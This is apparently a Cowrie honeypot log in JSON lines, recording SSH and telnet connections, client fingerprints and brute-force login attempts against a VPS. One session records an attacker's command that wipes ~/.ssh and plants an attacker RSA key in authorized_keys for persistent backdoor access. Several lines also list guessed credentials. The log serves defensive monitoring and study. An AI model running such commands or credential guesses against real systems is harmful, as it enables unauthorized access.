{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:12.649589Z","src_ip":"212.227.235.229","session":"c798be4f6d55"}
{"eventid":"cowrie.session.connect","src_ip":"119.236.173.134","src_port":37589,"dst_ip":"1.2.3.4","dst_port":23,"session":"0de3dcaa8193","protocol":"telnet","message":"New connection: 119.236.173.134:37589 (1.2.3.4:23) [session: 0de3dcaa8193]","sensor":"my-vps","timestamp":"2025-08-26T13:00:17.175461Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46364,"dst_ip":"1.2.3.4","dst_port":22,"session":"878f7de382d6","protocol":"ssh","message":"New connection: 212.227.235.229:46364 (1.2.3.4:22) [session: 878f7de382d6]","sensor":"my-vps","timestamp":"2025-08-26T13:00:21.466941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:21.467677Z","src_ip":"212.227.235.229","session":"878f7de382d6"}
{"eventid":"cowrie.session.connect","src_ip":"174.87.62.113","src_port":52602,"dst_ip":"1.2.3.4","dst_port":23,"session":"9cbaa5d05882","protocol":"telnet","message":"New connection: 174.87.62.113:52602 (1.2.3.4:23) [session: 9cbaa5d05882]","sensor":"my-vps","timestamp":"2025-08-26T13:00:24.451673Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46448,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd3856e998ac","protocol":"ssh","message":"New connection: 212.227.235.229:46448 (1.2.3.4:22) [session: fd3856e998ac]","sensor":"my-vps","timestamp":"2025-08-26T13:00:25.752538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:00:25.754030Z","src_ip":"212.227.235.229","session":"fd3856e998ac"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T13:00:25.961601Z","src_ip":"212.227.235.229","session":"fd3856e998ac"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe123","message":"login attempt [frappe/frappe123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:00:26.585304Z","src_ip":"212.227.235.229","session":"fd3856e998ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:26.745138Z","src_ip":"212.227.235.229","session":"878f7de382d6"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:26.747838Z","src_ip":"212.227.235.229","session":"878f7de382d6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:27.795137Z","src_ip":"212.227.235.229","session":"fd3856e998ac"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":52411,"dst_ip":"1.2.3.4","dst_port":23,"session":"cab7a6bf33d3","protocol":"telnet","message":"New connection: 123.31.39.100:52411 (1.2.3.4:23) [session: cab7a6bf33d3]","sensor":"my-vps","timestamp":"2025-08-26T13:00:28.198031Z"}
{"eventid":"cowrie.session.closed","duration":31.265010118484497,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:48.440396Z","src_ip":"119.236.173.134","session":"0de3dcaa8193"}
{"eventid":"cowrie.session.closed","duration":30.868150234222412,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:55.319745Z","src_ip":"174.87.62.113","session":"9cbaa5d05882"}
{"eventid":"cowrie.session.closed","duration":46.15983033180237,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:14.357790Z","src_ip":"123.31.39.100","session":"cab7a6bf33d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1f85fce8caf","protocol":"ssh","message":"New connection: 212.227.235.229:37296 (1.2.3.4:22) [session: f1f85fce8caf]","sensor":"my-vps","timestamp":"2025-08-26T13:01:15.765337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:01:15.766013Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:01:16.017452Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu@123","message":"login attempt [root/ubuntu@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:01:17.029923Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:01:17.593376Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:01:17.594081Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:01:17.595093Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:17.839035Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:01:18.404449Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:01:18.405173Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:01:18.650179Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:18.651324Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39830,"dst_ip":"1.2.3.4","dst_port":22,"session":"784fd1ec2ece","protocol":"ssh","message":"New connection: 212.227.235.229:39830 (1.2.3.4:22) [session: 784fd1ec2ece]","sensor":"my-vps","timestamp":"2025-08-26T13:01:18.893656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:01:18.894391Z","src_ip":"212.227.235.229","session":"784fd1ec2ece"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:01:19.138391Z","src_ip":"212.227.235.229","session":"784fd1ec2ece"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:01:20.154474Z","src_ip":"212.227.235.229","session":"784fd1ec2ece"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:21.401577Z","src_ip":"212.227.235.229","session":"784fd1ec2ece"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41630,"dst_ip":"1.2.3.4","dst_port":22,"session":"635f61a394f9","protocol":"ssh","message":"New connection: 212.227.235.229:41630 (1.2.3.4:22) [session: 635f61a394f9]","sensor":"my-vps","timestamp":"2025-08-26T13:01:21.638616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:01:21.639446Z","src_ip":"212.227.235.229","session":"635f61a394f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:01:21.880543Z","src_ip":"212.227.235.229","session":"635f61a394f9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:01:22.885865Z","src_ip":"212.227.235.229","session":"635f61a394f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:23.129285Z","src_ip":"212.227.235.229","session":"635f61a394f9"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:23.131782Z","src_ip":"212.227.235.229","session":"f1f85fce8caf"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":50056,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b35ec7105cf","protocol":"ssh","message":"New connection: 193.32.162.145:50056 (1.2.3.4:22) [session: 9b35ec7105cf]","sensor":"my-vps","timestamp":"2025-08-26T13:01:24.742901Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:24.773912Z","src_ip":"193.32.162.145","session":"9b35ec7105cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49378,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca367d07ee2","protocol":"ssh","message":"New connection: 212.227.235.229:49378 (1.2.3.4:22) [session: bca367d07ee2]","sensor":"my-vps","timestamp":"2025-08-26T13:01:49.830511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:01:49.831554Z","src_ip":"212.227.235.229","session":"bca367d07ee2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:01:50.082818Z","src_ip":"212.227.235.229","session":"bca367d07ee2"}
{"eventid":"cowrie.login.failed","username":"sistemas","password":"123456","message":"login attempt [sistemas/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:01:51.088315Z","src_ip":"212.227.235.229","session":"bca367d07ee2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:52.342812Z","src_ip":"212.227.235.229","session":"bca367d07ee2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32876,"dst_ip":"1.2.3.4","dst_port":22,"session":"133d5ba06802","protocol":"ssh","message":"New connection: 212.227.125.160:32876 (1.2.3.4:22) [session: 133d5ba06802]","sensor":"my-vps","timestamp":"2025-08-26T13:01:56.876325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:01:56.877109Z","src_ip":"212.227.125.160","session":"133d5ba06802"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:01:56.927749Z","src_ip":"212.227.125.160","session":"133d5ba06802"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123456","message":"login attempt [sol/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:01:57.081762Z","src_ip":"212.227.125.160","session":"133d5ba06802"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:01:58.138499Z","src_ip":"212.227.125.160","session":"133d5ba06802"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:02.918268Z","src_ip":"79.124.8.120","session":"ed30d4098481"}
{"eventid":"cowrie.session.closed","duration":180.07344913482666,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:02.923921Z","src_ip":"79.124.8.120","session":"ed30d4098481"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":59258,"dst_ip":"1.2.3.4","dst_port":22,"session":"80fbed9c3de7","protocol":"ssh","message":"New connection: 93.123.109.189:59258 (1.2.3.4:22) [session: 80fbed9c3de7]","sensor":"my-vps","timestamp":"2025-08-26T13:02:07.459452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:02:07.460498Z","src_ip":"93.123.109.189","session":"80fbed9c3de7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:02:07.479128Z","src_ip":"93.123.109.189","session":"80fbed9c3de7"}
